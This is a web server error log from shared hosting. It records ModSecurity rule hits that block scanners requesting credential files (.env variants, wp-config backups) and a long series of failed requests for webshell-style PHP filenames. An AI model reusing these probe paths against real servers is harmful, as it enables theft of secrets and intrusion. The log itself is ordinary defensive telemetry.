[Mon May 11 11:30:38.334516 2026] [security2:error] [pid 1254133:tid 1254136] [client 81.167.26.57:65013] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/\\"%ssupport"] [unique_id "agGhvhjZymfuKpjWXeh1DQAAAME"]
[Mon May 11 11:30:40.071595 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:10128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhvb4KNmD_mZ_vlf8yBwAAAEk"]
[Mon May 11 11:30:40.104967 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:10140] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /root/wp-config.bak_temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/root/wp-config.bak_temp"] [unique_id "agGhwJkIEwRJMyDaV55HBwAAAUo"]
[Mon May 11 11:30:40.105509 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:10140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/root/wp-config.bak_temp"] [unique_id "agGhwJkIEwRJMyDaV55HBwAAAUo"]
[Mon May 11 11:30:41.345902 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:10140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhwJkIEwRJMyDaV55HBwAAAUo"]
[Mon May 11 11:31:15.604170 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:23896] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scala/.env.old_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/scala/.env.old_production"] [unique_id "agGh40YQeUtAPynIs6xRygAAAAE"]
[Mon May 11 11:31:15.604813 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:23896] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/scala/.env.old_production"] [unique_id "agGh40YQeUtAPynIs6xRygAAAAE"]
[Mon May 11 11:31:17.857829 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:23896] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGh40YQeUtAPynIs6xRygAAAAE"]
[Mon May 11 11:31:17.883889 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:23910] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scala/.env.old_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/scala/.env.old_production"] [unique_id "agGh5b4KNmD_mZ_vlf8yMAAAAEM"]
[Mon May 11 11:31:17.884110 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:23910] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/scala/.env.old_production"] [unique_id "agGh5b4KNmD_mZ_vlf8yMAAAAEM"]
[Mon May 11 11:31:20.970603 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:23910] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGh5b4KNmD_mZ_vlf8yMAAAAEM"]
[Mon May 11 11:31:27.410553 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/admin.php
[Mon May 11 11:31:27.733004 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/supyffqkrnyxagxcjucnCdefault.php
[Mon May 11 11:31:27.903037 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/elp.php
[Mon May 11 11:31:28.061201 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/adminfuns.php
[Mon May 11 11:31:28.598468 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/php8.php
[Mon May 11 11:31:28.915762 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/inputs.php
[Mon May 11 11:31:29.073899 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/goods.php
[Mon May 11 11:31:29.231969 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/classwithtostring.php
[Mon May 11 11:31:29.404422 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/simple.php
[Mon May 11 11:31:29.562448 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/wp-mail.php
[Mon May 11 11:31:29.773342 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/about.php
[Mon May 11 11:31:29.931373 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/1.php
[Mon May 11 11:31:30.113291 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/file.php
[Mon May 11 11:31:30.366098 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/404.php
[Mon May 11 11:31:30.386215 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:21480] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env.staging.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/scripts/.env.staging.example"] [unique_id "agGh8kRdw2n9wv6Ai48A8gAAAIw"]
[Mon May 11 11:31:30.386851 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:21480] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/scripts/.env.staging.example"] [unique_id "agGh8kRdw2n9wv6Ai48A8gAAAIw"]
[Mon May 11 11:31:30.524517 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/wp-login.php
[Mon May 11 11:31:31.331261 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/php.php
[Mon May 11 11:31:32.087642 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/7.php
[Mon May 11 11:31:32.414666 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:21480] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGh8kRdw2n9wv6Ai48A8gAAAIw"]
[Mon May 11 11:31:32.442595 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:21496] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env.staging.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/scripts/.env.staging.example"] [unique_id "agGh9L4KNmD_mZ_vlf8yPAAAAEQ"]
[Mon May 11 11:31:32.443258 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:21496] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/scripts/.env.staging.example"] [unique_id "agGh9L4KNmD_mZ_vlf8yPAAAAEQ"]
[Mon May 11 11:31:32.497361 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/.well-known/acme-challenge/index.php
[Mon May 11 11:31:32.705779 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/atomlib.php
[Mon May 11 11:31:32.863849 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/chosen.php
[Mon May 11 11:31:33.022231 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/css.php
[Mon May 11 11:31:33.180289 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/files.php
[Mon May 11 11:31:33.524627 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/buy.php
[Mon May 11 11:31:33.682552 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/info.php
[Mon May 11 11:31:33.840550 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/wp.php
[Mon May 11 11:31:34.209091 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/wp-config-sample.php
[Mon May 11 11:31:34.496651 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:21496] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGh9L4KNmD_mZ_vlf8yPAAAAEQ"]
[Mon May 11 11:31:34.551790 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/666.php
[Mon May 11 11:31:34.923854 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/bgymj.php
[Mon May 11 11:31:35.083860 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/control.php
[Mon May 11 11:31:35.269538 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/randkeyword.PhP7
[Mon May 11 11:31:35.943615 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/file61.php
[Mon May 11 11:31:36.101666 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/p.php
[Mon May 11 11:31:36.259698 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/ms-edit.php
[Mon May 11 11:31:36.573528 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/alfanew.PHP7
[Mon May 11 11:31:36.916785 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/dx.php
[Mon May 11 11:31:37.436330 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/doc.php
[Mon May 11 11:31:37.594927 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/tool.php
[Mon May 11 11:31:38.106129 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/xx.php
[Mon May 11 11:31:38.264437 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/xxx.php
[Mon May 11 11:31:38.425701 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/100.php
[Mon May 11 11:31:39.043352 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/wp-blog.php
[Mon May 11 11:31:39.974362 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/data.php
[Mon May 11 11:31:40.133260 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/ioxi-o.php
[Mon May 11 11:31:40.291517 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/as.php
[Mon May 11 11:31:40.449637 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/term.php
[Mon May 11 11:31:41.023403 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/vx.php
[Mon May 11 11:31:41.378759 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/a7.php
[Mon May 11 11:31:41.901570 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/222.php
[Mon May 11 11:31:42.233351 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/7logs.php
[Mon May 11 11:31:42.416356 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/a.php
[Mon May 11 11:31:42.577965 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/abc.php
[Mon May 11 11:31:42.736033 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/fone1.php
[Mon May 11 11:31:42.894169 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/lib.php
[Mon May 11 11:31:43.141774 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/sadcut1.php
[Mon May 11 11:31:43.493628 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/xmlrpc.php
[Mon May 11 11:31:43.670523 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/aa.php
[Mon May 11 11:31:43.831120 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/admin.php
[Mon May 11 11:31:44.213347 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/amax.php
[Mon May 11 11:31:44.371667 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/av.php
[Mon May 11 11:31:46.884038 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/ahax.php
[Mon May 11 11:31:47.044101 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/alfa.php
[Mon May 11 11:31:47.557554 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/bolt.php
[Mon May 11 11:31:48.078637 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/wp-signin.php
[Mon May 11 11:31:48.497715 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/x.php
[Mon May 11 11:31:48.814661 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/bless.php
[Mon May 11 11:31:49.325545 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/content.php
[Mon May 11 11:31:49.511509 2026] [:error] [pid 1254133:tid 1254160] [client 4.193.121.6:11200] File does not exist: /home/piregwan/public_html/radio.php
[Mon May 11 11:31:50.149136 2026] [authz_core:error] [pid 1254212:tid 1254222] [client 195.178.110.64:60022] AH01630: client denied by server configuration: /home/hominfr/public_html/wp-content/plugins, referer: https://www.homin.fr/wp-login.php
[Mon May 11 11:31:51.653362 2026] [:error] [pid 1254179:tid 1254188] [client 4.193.121.6:4853] File does not exist: /home/piregwan/public_html/aaa.php
[Mon May 11 11:31:51.810925 2026] [:error] [pid 1254179:tid 1254188] [client 4.193.121.6:4853] File does not exist: /home/piregwan/public_html/abcd.php
[Mon May 11 11:32:10.972537 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:51122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /selenium/.env.example.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/selenium/.env.example.backup"] [unique_id "agGiGmS6k_SCYd1AVZqoLwAAAQg"]
[Mon May 11 11:32:10.974716 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:51122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/selenium/.env.example.backup"] [unique_id "agGiGmS6k_SCYd1AVZqoLwAAAQg"]
[Mon May 11 11:32:12.624308 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:51122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiGmS6k_SCYd1AVZqoLwAAAQg"]
[Mon May 11 11:32:12.651861 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:51126] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /selenium/.env.example.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/selenium/.env.example.backup"] [unique_id "agGiHJkIEwRJMyDaV55HxAAAAU4"]
[Mon May 11 11:32:12.652188 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:51126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/selenium/.env.example.backup"] [unique_id "agGiHJkIEwRJMyDaV55HxAAAAU4"]
[Mon May 11 11:32:14.542865 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:51126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiHJkIEwRJMyDaV55HxAAAAU4"]
[Mon May 11 11:32:14.573566 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:38874] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /selenium/.env.staging_staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/selenium/.env.staging_staging"] [unique_id "agGiHmS6k_SCYd1AVZqoMgAAARA"]
